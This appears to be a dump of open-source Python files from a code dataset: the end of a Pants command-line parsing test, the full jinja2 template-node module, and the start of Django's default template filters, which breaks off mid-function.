self._split('./pants test.junit --reporting-template-dir=path foo:bar',
['test'],
{'': [], 'reporting': ['--template-dir=path'], 'test.junit': []}, ['foo:bar'])
def test_help_detection(self):
self._split_help('./pants', [], {'': []}, [])
self._split_help('./pants goal', [], {'': []}, [])
self._split_help('./pants -f', [], {'': ['-f']}, [])
self._split_help('./pants goal -f', [], {'': ['-f']}, [])
self._split_help('./pants help', [], {'': []}, [])
self._split_help('./pants goal help', [], {'': []}, [])
self._split_help('./pants -h', [], {'': []}, [])
self._split_help('./pants goal -h', [], {'': []}, [])
self._split_help('./pants --help', [], {'': []}, [])
self._split_help('./pants goal --help', [], {'': []}, [])
self._split_help('./pants help compile -x', ['compile'],
{'': [], 'compile': ['-x']}, [])
self._split_help('./pants help compile -x', ['compile'],
{'': [], 'compile': ['-x']}, [])
self._split_help('./pants compile -h', ['compile'],
{'': [], 'compile': []}, [])
self._split_help('./pants compile --help test', ['compile', 'test'],
{'': [], 'compile': [], 'test': []}, [])
self._split_help('./pants test src/foo/bar:baz -h', ['test'],
{'': [], 'test': []}, ['src/foo/bar:baz'])
self._split_help('./pants help-advanced', [], {'': []}, [], True, False)
self._split_help('./pants help-all', [], {'': []}, [], False, True)
self._split_help('./pants --help-advanced', [], {'': []}, [], True, False)
self._split_help('./pants --help-all', [], {'': []}, [], False, True)
self._split_help('./pants --help --help-advanced', [], {'': []}, [], True, False)
self._split_help('./pants --help-advanced --help', [], {'': []}, [], True, False)
self._split_help('./pants --help --help-all', [], {'': []}, [], False, True)
self._split_help('./pants --help-all --help --help-advanced', [], {'': []}, [], True, True)
self._split_help('./pants help --help-advanced', [], {'': []}, [], True, False)
self._split_help('./pants help-advanced --help-all', [], {'': []}, [], True, True)
self._split_help('./pants compile --help-advanced test', ['compile', 'test'],
{'': [], 'compile': [], 'test': []}, [], True, False)
self._split_help('./pants help-advanced compile', ['compile'],
{'': [], 'compile': []}, [], True, False)
self._split_help('./pants compile help-all test --help', ['compile', 'test'],
{'': [], 'compile': [], 'test': []}, [], False, True)
def test_version_request_detection(self):
self._split_version_request('./pants -v')
self._split_version_request('./pants -V')
self._split_version_request('./pants --version')
    # A version request supersedes anything else.
self._split_version_request('./pants --version compile --foo --bar path/to/target')
def test_unknown_goal_detection(self):
self._split_unknown_goal('./pants foo', ['foo'])
self._split_unknown_goal('./pants compile foo', ['foo'])
self._split_unknown_goal('./pants foo bar baz:qux', ['foo', 'bar'])
self._split_unknown_goal('./pants foo compile bar baz:qux', ['foo', 'bar'])
def test_no_goal_detection(self):
self._split_no_goal('./pants foo/bar:baz')
| apache-2.0 |
MadeiraCloud/opsagent | libs/jinja2/nodes.py | 623 | 28875 | # -*- coding: utf-8 -*-
"""
jinja2.nodes
~~~~~~~~~~~~
This module implements additional nodes derived from the ast base node.
It also provides some node tree helper functions like `in_lineno` and
`get_nodes` used by the parser and translator in order to normalize
python and jinja nodes.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import operator
from collections import deque
from jinja2.utils import Markup
from jinja2._compat import next, izip, with_metaclass, text_type, \
method_type, function_type
#: the types we support for context functions
_context_function_types = (function_type, method_type)
_binop_to_func = {
'*': operator.mul,
'/': operator.truediv,
'//': operator.floordiv,
'**': operator.pow,
'%': operator.mod,
'+': operator.add,
'-': operator.sub
}
_uaop_to_func = {
'not': operator.not_,
'+': operator.pos,
'-': operator.neg
}
_cmpop_to_func = {
'eq': operator.eq,
'ne': operator.ne,
'gt': operator.gt,
'gteq': operator.ge,
'lt': operator.lt,
'lteq': operator.le,
'in': lambda a, b: a in b,
'notin': lambda a, b: a not in b
}
class Impossible(Exception):
"""Raised if the node could not perform a requested action."""
class NodeType(type):
"""A metaclass for nodes that handles the field and attribute
inheritance. fields and attributes from the parent class are
automatically forwarded to the child."""
def __new__(cls, name, bases, d):
for attr in 'fields', 'attributes':
storage = []
storage.extend(getattr(bases[0], attr, ()))
storage.extend(d.get(attr, ()))
assert len(bases) == 1, 'multiple inheritance not allowed'
assert len(storage) == len(set(storage)), 'layout conflict'
d[attr] = tuple(storage)
d.setdefault('abstract', False)
return type.__new__(cls, name, bases, d)
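# Illustrative note (added for clarity, not in the original source): thanks
# to the field/attribute forwarding above, a subclass only declares what it
# adds. ``BinExpr`` declares fields ('left', 'right'), so a subclass such as
# ``Add`` can be constructed as ``Add(left, right)`` without redeclaring them.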
class EvalContext(object):
"""Holds evaluation time information. Custom attributes can be attached
to it in extensions.
"""
def __init__(self, environment, template_name=None):
self.environment = environment
if callable(environment.autoescape):
self.autoescape = environment.autoescape(template_name)
else:
self.autoescape = environment.autoescape
self.volatile = False
def save(self):
return self.__dict__.copy()
def revert(self, old):
self.__dict__.clear()
self.__dict__.update(old)
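# Illustrative usage (assumed, not part of the original source): extensions
# can snapshot and restore the evaluation context, e.g.
#   old = eval_ctx.save(); ...; eval_ctx.revert(old)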
def get_eval_context(node, ctx):
if ctx is None:
if node.environment is None:
raise RuntimeError('if no eval context is passed, the '
'node must have an attached '
'environment.')
return EvalContext(node.environment)
return ctx
class Node(with_metaclass(NodeType, object)):
"""Baseclass for all Jinja2 nodes. There are a number of nodes available
of different types. There are four major types:
- :class:`Stmt`: statements
- :class:`Expr`: expressions
- :class:`Helper`: helper nodes
- :class:`Template`: the outermost wrapper node
All nodes have fields and attributes. Fields may be other nodes, lists,
or arbitrary values. Fields are passed to the constructor as regular
positional arguments, attributes as keyword arguments. Each node has
two attributes: `lineno` (the line number of the node) and `environment`.
The `environment` attribute is set at the end of the parsing process for
all nodes automatically.
"""
fields = ()
attributes = ('lineno', 'environment')
abstract = True
def __init__(self, *fields, **attributes):
if self.abstract:
            raise TypeError('abstract nodes are not instantiable')
if fields:
if len(fields) != len(self.fields):
if not self.fields:
raise TypeError('%r takes 0 arguments' %
self.__class__.__name__)
raise TypeError('%r takes 0 or %d argument%s' % (
self.__class__.__name__,
len(self.fields),
len(self.fields) != 1 and 's' or ''
))
for name, arg in izip(self.fields, fields):
setattr(self, name, arg)
for attr in self.attributes:
setattr(self, attr, attributes.pop(attr, None))
if attributes:
raise TypeError('unknown attribute %r' %
next(iter(attributes)))
def iter_fields(self, exclude=None, only=None):
"""This method iterates over all fields that are defined and yields
``(key, value)`` tuples. Per default all fields are returned, but
it's possible to limit that to some fields by providing the `only`
parameter or to exclude some using the `exclude` parameter. Both
should be sets or tuples of field names.
"""
for name in self.fields:
if (exclude is only is None) or \
(exclude is not None and name not in exclude) or \
(only is not None and name in only):
try:
yield name, getattr(self, name)
except AttributeError:
pass
def iter_child_nodes(self, exclude=None, only=None):
"""Iterates over all direct child nodes of the node. This iterates
        over all fields and yields the values if they are nodes. If the value
of a field is a list all the nodes in that list are returned.
"""
for field, item in self.iter_fields(exclude, only):
if isinstance(item, list):
for n in item:
if isinstance(n, Node):
yield n
elif isinstance(item, Node):
yield item
def find(self, node_type):
"""Find the first node of a given type. If no such node exists the
return value is `None`.
"""
for result in self.find_all(node_type):
return result
def find_all(self, node_type):
"""Find all the nodes of a given type. If the type is a tuple,
the check is performed for any of the tuple items.
"""
for child in self.iter_child_nodes():
if isinstance(child, node_type):
yield child
for result in child.find_all(node_type):
yield result
def set_ctx(self, ctx):
"""Reset the context of a node and all child nodes. Per default the
        parser will generate nodes that all have a 'load' context, as it's the
most common one. This method is used in the parser to set assignment
targets and other nodes to a store context.
"""
todo = deque([self])
while todo:
node = todo.popleft()
if 'ctx' in node.fields:
node.ctx = ctx
todo.extend(node.iter_child_nodes())
return self
def set_lineno(self, lineno, override=False):
"""Set the line numbers of the node and children."""
todo = deque([self])
while todo:
node = todo.popleft()
if 'lineno' in node.attributes:
if node.lineno is None or override:
node.lineno = lineno
todo.extend(node.iter_child_nodes())
return self
def set_environment(self, environment):
"""Set the environment for all nodes."""
todo = deque([self])
while todo:
node = todo.popleft()
node.environment = environment
todo.extend(node.iter_child_nodes())
return self
def __eq__(self, other):
return type(self) is type(other) and \
tuple(self.iter_fields()) == tuple(other.iter_fields())
def __ne__(self, other):
return not self.__eq__(other)
# Restore Python 2 hashing behavior on Python 3
__hash__ = object.__hash__
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
', '.join('%s=%r' % (arg, getattr(self, arg, None)) for
arg in self.fields)
)
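# Illustrative usage (assumed, not part of the original source): fields are
# passed positionally and attributes as keywords, so a name lookup node can
# be built as ``Name('foo', 'load', lineno=1)``.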
class Stmt(Node):
"""Base node for all statements."""
abstract = True
class Helper(Node):
"""Nodes that exist in a specific context only."""
abstract = True
class Template(Node):
"""Node that represents a template. This must be the outermost node that
is passed to the compiler.
"""
fields = ('body',)
class Output(Stmt):
"""A node that holds multiple expressions which are then printed out.
This is used both for the `print` statement and the regular template data.
"""
fields = ('nodes',)
class Extends(Stmt):
"""Represents an extends statement."""
fields = ('template',)
class For(Stmt):
"""The for loop. `target` is the target for the iteration (usually a
:class:`Name` or :class:`Tuple`), `iter` the iterable. `body` is a list
of nodes that are used as loop-body, and `else_` a list of nodes for the
`else` block. If no else node exists it has to be an empty list.
For filtered nodes an expression can be stored as `test`, otherwise `None`.
"""
fields = ('target', 'iter', 'body', 'else_', 'test', 'recursive')
class If(Stmt):
"""If `test` is true, `body` is rendered, else `else_`."""
fields = ('test', 'body', 'else_')
class Macro(Stmt):
"""A macro definition. `name` is the name of the macro, `args` a list of
arguments and `defaults` a list of defaults if there are any. `body` is
a list of nodes for the macro body.
"""
fields = ('name', 'args', 'defaults', 'body')
class CallBlock(Stmt):
"""Like a macro without a name but a call instead. `call` is called with
the unnamed macro as `caller` argument this node holds.
"""
fields = ('call', 'args', 'defaults', 'body')
class FilterBlock(Stmt):
"""Node for filter sections."""
fields = ('body', 'filter')
class Block(Stmt):
"""A node that represents a block."""
fields = ('name', 'body', 'scoped')
class Include(Stmt):
"""A node that represents the include tag."""
fields = ('template', 'with_context', 'ignore_missing')
class Import(Stmt):
"""A node that represents the import tag."""
fields = ('template', 'target', 'with_context')
class FromImport(Stmt):
"""A node that represents the from import tag. It's important to not
pass unsafe names to the name attribute. The compiler translates the
attribute lookups directly into getattr calls and does *not* use the
subscript callback of the interface. As exported variables may not
start with double underscores (which the parser asserts) this is not a
problem for regular Jinja code, but if this node is used in an extension
extra care must be taken.
The list of names may contain tuples if aliases are wanted.
"""
fields = ('template', 'names', 'with_context')
class ExprStmt(Stmt):
"""A statement that evaluates an expression and discards the result."""
fields = ('node',)
class Assign(Stmt):
"""Assigns an expression to a target."""
fields = ('target', 'node')
class Expr(Node):
"""Baseclass for all expressions."""
abstract = True
def as_const(self, eval_ctx=None):
"""Return the value of the expression as constant or raise
:exc:`Impossible` if this was not possible.
An :class:`EvalContext` can be provided, if none is given
a default context is created which requires the nodes to have
an attached environment.
.. versionchanged:: 2.4
the `eval_ctx` parameter was added.
"""
raise Impossible()
def can_assign(self):
"""Check if it's possible to assign something to this node."""
return False
class BinExpr(Expr):
"""Baseclass for all binary expressions."""
fields = ('left', 'right')
operator = None
abstract = True
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
# intercepted operators cannot be folded at compile time
if self.environment.sandboxed and \
self.operator in self.environment.intercepted_binops:
raise Impossible()
f = _binop_to_func[self.operator]
try:
return f(self.left.as_const(eval_ctx), self.right.as_const(eval_ctx))
except Exception:
raise Impossible()
class UnaryExpr(Expr):
"""Baseclass for all unary expressions."""
fields = ('node',)
operator = None
abstract = True
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
# intercepted operators cannot be folded at compile time
if self.environment.sandboxed and \
self.operator in self.environment.intercepted_unops:
raise Impossible()
f = _uaop_to_func[self.operator]
try:
return f(self.node.as_const(eval_ctx))
except Exception:
raise Impossible()
class Name(Expr):
"""Looks up a name or stores a value in a name.
The `ctx` of the node can be one of the following values:
- `store`: store a value in the name
- `load`: load that name
- `param`: like `store` but if the name was defined as function parameter.
"""
fields = ('name', 'ctx')
def can_assign(self):
return self.name not in ('true', 'false', 'none',
'True', 'False', 'None')
class Literal(Expr):
"""Baseclass for literals."""
abstract = True
class Const(Literal):
"""All constant values. The parser will return this node for simple
constants such as ``42`` or ``"foo"`` but it can be used to store more
complex values such as lists too. Only constants with a safe
    representation (objects where ``eval(repr(x)) == x`` is true) may be
    stored this way.
"""
fields = ('value',)
def as_const(self, eval_ctx=None):
return self.value
@classmethod
def from_untrusted(cls, value, lineno=None, environment=None):
"""Return a const object if the value is representable as
constant value in the generated code, otherwise it will raise
an `Impossible` exception.
"""
from .compiler import has_safe_repr
if not has_safe_repr(value):
raise Impossible()
return cls(value, lineno=lineno, environment=environment)
class TemplateData(Literal):
"""A constant template string."""
fields = ('data',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
if eval_ctx.autoescape:
return Markup(self.data)
return self.data
class Tuple(Literal):
"""For loop unpacking and some other things like multiple arguments
for subscripts. Like for :class:`Name` `ctx` specifies if the tuple
is used for loading the names or storing.
"""
fields = ('items', 'ctx')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return tuple(x.as_const(eval_ctx) for x in self.items)
def can_assign(self):
for item in self.items:
if not item.can_assign():
return False
return True
class List(Literal):
"""Any list literal such as ``[1, 2, 3]``"""
fields = ('items',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return [x.as_const(eval_ctx) for x in self.items]
class Dict(Literal):
"""Any dict literal such as ``{1: 2, 3: 4}``. The items must be a list of
:class:`Pair` nodes.
"""
fields = ('items',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return dict(x.as_const(eval_ctx) for x in self.items)
class Pair(Helper):
"""A key, value pair for dicts."""
fields = ('key', 'value')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.key.as_const(eval_ctx), self.value.as_const(eval_ctx)
class Keyword(Helper):
"""A key, value pair for keyword arguments where key is a string."""
fields = ('key', 'value')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.key, self.value.as_const(eval_ctx)
class CondExpr(Expr):
"""A conditional expression (inline if expression). (``{{
foo if bar else baz }}``)
"""
fields = ('test', 'expr1', 'expr2')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if self.test.as_const(eval_ctx):
return self.expr1.as_const(eval_ctx)
# if we evaluate to an undefined object, we better do that at runtime
if self.expr2 is None:
raise Impossible()
return self.expr2.as_const(eval_ctx)
class Filter(Expr):
"""This node applies a filter on an expression. `name` is the name of
the filter, the rest of the fields are the same as for :class:`Call`.
If the `node` of a filter is `None` the contents of the last buffer are
filtered. Buffers are created by macros and filter blocks.
"""
fields = ('node', 'name', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile or self.node is None:
raise Impossible()
# we have to be careful here because we call filter_ below.
# if this variable would be called filter, 2to3 would wrap the
        # call in a list because it is assuming we are talking about the
# builtin filter function here which no longer returns a list in
# python 3. because of that, do not rename filter_ to filter!
filter_ = self.environment.filters.get(self.name)
if filter_ is None or getattr(filter_, 'contextfilter', False):
raise Impossible()
obj = self.node.as_const(eval_ctx)
args = [x.as_const(eval_ctx) for x in self.args]
if getattr(filter_, 'evalcontextfilter', False):
args.insert(0, eval_ctx)
elif getattr(filter_, 'environmentfilter', False):
args.insert(0, self.environment)
kwargs = dict(x.as_const(eval_ctx) for x in self.kwargs)
if self.dyn_args is not None:
try:
args.extend(self.dyn_args.as_const(eval_ctx))
except Exception:
raise Impossible()
if self.dyn_kwargs is not None:
try:
kwargs.update(self.dyn_kwargs.as_const(eval_ctx))
except Exception:
raise Impossible()
try:
return filter_(obj, *args, **kwargs)
except Exception:
raise Impossible()
class Test(Expr):
"""Applies a test on an expression. `name` is the name of the test, the
rest of the fields are the same as for :class:`Call`.
"""
fields = ('node', 'name', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
class Call(Expr):
"""Calls an expression. `args` is a list of arguments, `kwargs` a list
of keyword arguments (list of :class:`Keyword` nodes), and `dyn_args`
and `dyn_kwargs` has to be either `None` or a node that is used as
node for dynamic positional (``*args``) or keyword (``**kwargs``)
arguments.
"""
fields = ('node', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
obj = self.node.as_const(eval_ctx)
# don't evaluate context functions
args = [x.as_const(eval_ctx) for x in self.args]
if isinstance(obj, _context_function_types):
if getattr(obj, 'contextfunction', False):
raise Impossible()
elif getattr(obj, 'evalcontextfunction', False):
args.insert(0, eval_ctx)
elif getattr(obj, 'environmentfunction', False):
args.insert(0, self.environment)
kwargs = dict(x.as_const(eval_ctx) for x in self.kwargs)
if self.dyn_args is not None:
try:
args.extend(self.dyn_args.as_const(eval_ctx))
except Exception:
raise Impossible()
if self.dyn_kwargs is not None:
try:
kwargs.update(self.dyn_kwargs.as_const(eval_ctx))
except Exception:
raise Impossible()
try:
return obj(*args, **kwargs)
except Exception:
raise Impossible()
class Getitem(Expr):
"""Get an attribute or item from an expression and prefer the item."""
fields = ('node', 'arg', 'ctx')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if self.ctx != 'load':
raise Impossible()
try:
return self.environment.getitem(self.node.as_const(eval_ctx),
self.arg.as_const(eval_ctx))
except Exception:
raise Impossible()
def can_assign(self):
return False
class Getattr(Expr):
"""Get an attribute or item from an expression that is a ascii-only
bytestring and prefer the attribute.
"""
fields = ('node', 'attr', 'ctx')
def as_const(self, eval_ctx=None):
if self.ctx != 'load':
raise Impossible()
try:
eval_ctx = get_eval_context(self, eval_ctx)
return self.environment.getattr(self.node.as_const(eval_ctx),
self.attr)
except Exception:
raise Impossible()
def can_assign(self):
return False
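# Illustrative example (added for clarity, not in the original source): a
# template expression like ``foo.bar`` is represented as
#   Getattr(Name('foo', 'load'), 'bar', 'load')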
class Slice(Expr):
"""Represents a slice object. This must only be used as argument for
:class:`Subscript`.
"""
fields = ('start', 'stop', 'step')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
def const(obj):
if obj is None:
return None
return obj.as_const(eval_ctx)
return slice(const(self.start), const(self.stop), const(self.step))
class Concat(Expr):
"""Concatenates the list of expressions provided after converting them to
unicode.
"""
fields = ('nodes',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return ''.join(text_type(x.as_const(eval_ctx)) for x in self.nodes)
class Compare(Expr):
"""Compares an expression with some other expressions. `ops` must be a
list of :class:`Operand`\s.
"""
fields = ('expr', 'ops')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
result = value = self.expr.as_const(eval_ctx)
try:
for op in self.ops:
new_value = op.expr.as_const(eval_ctx)
result = _cmpop_to_func[op.op](value, new_value)
value = new_value
except Exception:
raise Impossible()
return result
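# Illustrative example (added for clarity, not in the original source): a
# chained comparison such as ``1 < 2 < 3`` is represented as
#   Compare(Const(1), [Operand('lt', Const(2)), Operand('lt', Const(3))])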
class Operand(Helper):
"""Holds an operator and an expression."""
fields = ('op', 'expr')
if __debug__:
Operand.__doc__ += '\nThe following operators are available: ' + \
', '.join(sorted('``%s``' % x for x in set(_binop_to_func) |
set(_uaop_to_func) | set(_cmpop_to_func)))
class Mul(BinExpr):
"""Multiplies the left with the right node."""
operator = '*'
class Div(BinExpr):
"""Divides the left by the right node."""
operator = '/'
class FloorDiv(BinExpr):
"""Divides the left by the right node and truncates conver the
result into an integer by truncating.
"""
operator = '//'
class Add(BinExpr):
"""Add the left to the right node."""
operator = '+'
class Sub(BinExpr):
"""Substract the right from the left node."""
operator = '-'
class Mod(BinExpr):
"""Left modulo right."""
operator = '%'
class Pow(BinExpr):
"""Left to the power of right."""
operator = '**'
class And(BinExpr):
"""Short circuited AND."""
operator = 'and'
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.left.as_const(eval_ctx) and self.right.as_const(eval_ctx)
class Or(BinExpr):
"""Short circuited OR."""
operator = 'or'
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.left.as_const(eval_ctx) or self.right.as_const(eval_ctx)
class Not(UnaryExpr):
"""Negate the expression."""
operator = 'not'
class Neg(UnaryExpr):
"""Make the expression negative."""
operator = '-'
class Pos(UnaryExpr):
"""Make the expression positive (noop for most expressions)"""
operator = '+'
# Helpers for extensions
class EnvironmentAttribute(Expr):
"""Loads an attribute from the environment object. This is useful for
extensions that want to call a callback stored on the environment.
"""
fields = ('name',)
class ExtensionAttribute(Expr):
"""Returns the attribute of an extension bound to the environment.
The identifier is the identifier of the :class:`Extension`.
This node is usually constructed by calling the
:meth:`~jinja2.ext.Extension.attr` method on an extension.
"""
fields = ('identifier', 'name')
class ImportedName(Expr):
"""If created with an import name the import name is returned on node
access. For example ``ImportedName('cgi.escape')`` returns the `escape`
function from the cgi module on evaluation. Imports are optimized by the
compiler so there is no need to assign them to local variables.
"""
fields = ('importname',)
class InternalName(Expr):
"""An internal name in the compiler. You cannot create these nodes
yourself but the parser provides a
:meth:`~jinja2.parser.Parser.free_identifier` method that creates
a new identifier for you. This identifier is not available from the
    template and is not treated specially by the compiler.
"""
fields = ('name',)
def __init__(self):
raise TypeError('Can\'t create internal names. Use the '
'`free_identifier` method on a parser.')
class MarkSafe(Expr):
"""Mark the wrapped expression as safe (wrap it as `Markup`)."""
fields = ('expr',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return Markup(self.expr.as_const(eval_ctx))
class MarkSafeIfAutoescape(Expr):
"""Mark the wrapped expression as safe (wrap it as `Markup`) but
only if autoescaping is active.
.. versionadded:: 2.5
"""
fields = ('expr',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
expr = self.expr.as_const(eval_ctx)
if eval_ctx.autoescape:
return Markup(expr)
return expr
class ContextReference(Expr):
"""Returns the current template context. It can be used like a
:class:`Name` node, with a ``'load'`` ctx and will return the
current :class:`~jinja2.runtime.Context` object.
Here an example that assigns the current template name to a
variable named `foo`::
Assign(Name('foo', ctx='store'),
Getattr(ContextReference(), 'name'))
"""
class Continue(Stmt):
"""Continue a loop."""
class Break(Stmt):
"""Break a loop."""
class Scope(Stmt):
"""An artificial scope."""
fields = ('body',)
class EvalContextModifier(Stmt):
"""Modifies the eval context. For each option that should be modified,
a :class:`Keyword` has to be added to the :attr:`options` list.
Example to change the `autoescape` setting::
EvalContextModifier(options=[Keyword('autoescape', Const(True))])
"""
fields = ('options',)
class ScopedEvalContextModifier(EvalContextModifier):
"""Modifies the eval context and reverts it later. Works exactly like
:class:`EvalContextModifier` but will only modify the
:class:`~jinja2.nodes.EvalContext` for nodes in the :attr:`body`.
"""
fields = ('body',)
# make sure nobody creates custom nodes
def _failing_new(*args, **kwargs):
raise TypeError('can\'t create custom node types')
NodeType.__new__ = staticmethod(_failing_new); del _failing_new
| apache-2.0 |
gminds/rapidnewsng | django/template/defaultfilters.py | 105 | 28133 | """Default variable filters."""
from __future__ import unicode_literals
import re
import random as random_module
import unicodedata
from decimal import Decimal, InvalidOperation, Context, ROUND_HALF_UP
from functools import wraps
from pprint import pformat
from django.template.base import Variable, Library, VariableDoesNotExist
from django.conf import settings
from django.utils import formats
from django.utils.dateformat import format, time_format
from django.utils.encoding import force_text, iri_to_uri
from django.utils.html import (conditional_escape, escapejs, fix_ampersands,
escape, urlize as urlize_impl, linebreaks, strip_tags)
from django.utils.http import urlquote
from django.utils.text import Truncator, wrap, phone2numeric
from django.utils.safestring import mark_safe, SafeData, mark_for_escaping
from django.utils import six
from django.utils.timesince import timesince, timeuntil
from django.utils.translation import ugettext, ungettext
from django.utils.text import normalize_newlines
register = Library()
#######################
# STRING DECORATOR #
#######################
def stringfilter(func):
"""
Decorator for filters which should only receive unicode objects. The object
passed as the first positional argument will be converted to a unicode
object.
"""
def _dec(*args, **kwargs):
if args:
args = list(args)
args[0] = force_text(args[0])
if (isinstance(args[0], SafeData) and
getattr(_dec._decorated_function, 'is_safe', False)):
return mark_safe(func(*args, **kwargs))
return func(*args, **kwargs)
# Include a reference to the real function (used to check original
# arguments by the template parser, and to bear the 'is_safe' attribute
# when multiple decorators are applied).
_dec._decorated_function = getattr(func, '_decorated_function', func)
for attr in ('is_safe', 'needs_autoescape'):
if hasattr(func, attr):
import warnings
warnings.warn("Setting the %s attribute of a template filter "
"function is deprecated; use @register.filter(%s=%s) "
"instead" % (attr, attr, getattr(func, attr)),
DeprecationWarning)
setattr(_dec, attr, getattr(func, attr))
return wraps(func)(_dec)
###################
# STRINGS #
###################
@register.filter(is_safe=True)
@stringfilter
def addslashes(value):
"""
Adds slashes before quotes. Useful for escaping strings in CSV, for
example. Less useful for escaping JavaScript; use the ``escapejs``
filter instead.
"""
return value.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")
@register.filter(is_safe=True)
@stringfilter
def capfirst(value):
"""Capitalizes the first character of the value."""
return value and value[0].upper() + value[1:]
@register.filter("escapejs")
@stringfilter
def escapejs_filter(value):
"""Hex encodes characters for use in JavaScript strings."""
return escapejs(value)
@register.filter("fix_ampersands", is_safe=True)
@stringfilter
def fix_ampersands_filter(value):
"""Replaces ampersands with ``&`` entities."""
return fix_ampersands(value)
# Values for testing floatformat input against infinity and NaN representations,
# which differ across platforms and Python versions. Some (i.e. old Windows
# ones) are not recognized by Decimal but we want to return them unchanged vs.
# returning an empty string as we do for completely invalid input. Note these
# need to be built up from values that are not inf/nan, since inf/nan values do
# not reload properly from .pyc files on Windows prior to some level of Python 2.5
# (see Python Issue757815 and Issue1080440).
pos_inf = 1e200 * 1e200
neg_inf = -1e200 * 1e200
nan = (1e200 * 1e200) // (1e200 * 1e200)
special_floats = [str(pos_inf), str(neg_inf), str(nan)]
@register.filter(is_safe=True)
def floatformat(text, arg=-1):
"""
Displays a float to a specified number of decimal places.
If called without an argument, it displays the floating point number with
one decimal place -- but only if there's a decimal place to be displayed:
* num1 = 34.23234
* num2 = 34.00000
* num3 = 34.26000
* {{ num1|floatformat }} displays "34.2"
* {{ num2|floatformat }} displays "34"
* {{ num3|floatformat }} displays "34.3"
If arg is positive, it will always display exactly arg number of decimal
places:
* {{ num1|floatformat:3 }} displays "34.232"
* {{ num2|floatformat:3 }} displays "34.000"
* {{ num3|floatformat:3 }} displays "34.260"
If arg is negative, it will display arg number of decimal places -- but
only if there are places to be displayed:
* {{ num1|floatformat:"-3" }} displays "34.232"
* {{ num2|floatformat:"-3" }} displays "34"
* {{ num3|floatformat:"-3" }} displays "34.260"
If the input float is infinity or NaN, the (platform-dependent) string
representation of that value will be displayed.
"""
try:
input_val = force_text(text)
d = Decimal(input_val)
except UnicodeEncodeError:
return ''
except InvalidOperation:
if input_val in special_floats:
return input_val
try:
d = Decimal(force_text(float(text)))
except (ValueError, InvalidOperation, TypeError, UnicodeEncodeError):
return ''
try:
p = int(arg)
except ValueError:
return input_val
try:
m = int(d) - d
except (ValueError, OverflowError, InvalidOperation):
return input_val
if not m and p < 0:
return mark_safe(formats.number_format('%d' % (int(d)), 0))
if p == 0:
exp = Decimal(1)
else:
exp = Decimal('1.0') / (Decimal(10) ** abs(p))
try:
# Set the precision high enough to avoid an exception, see #15789.
tupl = d.as_tuple()
units = len(tupl[1]) - tupl[2]
prec = abs(p) + units + 1
# Avoid conversion to scientific notation by accessing `sign`, `digits`
# and `exponent` from `Decimal.as_tuple()` directly.
sign, digits, exponent = d.quantize(exp, ROUND_HALF_UP,
Context(prec=prec)).as_tuple()
digits = [six.text_type(digit) for digit in reversed(digits)]
while len(digits) <= abs(exponent):
digits.append('0')
digits.insert(-exponent, '.')
if sign:
digits.append('-')
number = ''.join(reversed(digits))
return mark_safe(formats.number_format(number, abs(p)))
except InvalidOperation:
return input_val
@register.filter(is_safe=True)
@stringfilter
def iriencode(value):
"""Escapes an IRI value for use in a URL."""
return force_text(iri_to_uri(value))
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def linenumbers(value, autoescape=None):
"""Displays text with line numbers."""
lines = value.split('\n')
# Find the maximum width of the line count, for use with zero padding
# string format command
width = six.text_type(len(six.text_type(len(lines))))
if not autoescape or isinstance(value, SafeData):
for i, line in enumerate(lines):
lines[i] = ("%0" + width + "d. %s") % (i + 1, line)
else:
for i, line in enumerate(lines):
lines[i] = ("%0" + width + "d. %s") % (i + 1, escape(line))
return mark_safe('\n'.join(lines))
@register.filter(is_safe=True)
@stringfilter
def lower(value):
"""Converts a string into all lowercase."""
return value.lower()
@register.filter(is_safe=False)
@stringfilter
def make_list(value):
"""
Returns the value turned into a list.
For an integer, it's a list of digits.
For a string, it's a list of characters.
"""
return list(value)
@register.filter(is_safe=True)
@stringfilter
def slugify(value):
"""
Converts to lowercase, removes non-word characters (alphanumerics and
underscores) and converts spaces to hyphens. Also strips leading and
trailing whitespace.
"""
from django.utils.text import slugify
return slugify(value)
@register.filter(is_safe=True)
def stringformat(value, arg):
"""
Formats the variable according to the arg, a string formatting specifier.
    This specifier uses Python string formatting syntax, with the exception that
the leading "%" is dropped.
See http://docs.python.org/lib/typesseq-strings.html for documentation
of Python string formatting
"""
try:
return ("%" + six.text_type(arg)) % value
except (ValueError, TypeError):
return ""
@register.filter(is_safe=True)
@stringfilter
def title(value):
"""Converts a string into titlecase."""
t = re.sub("([a-z])'([A-Z])", lambda m: m.group(0).lower(), value.title())
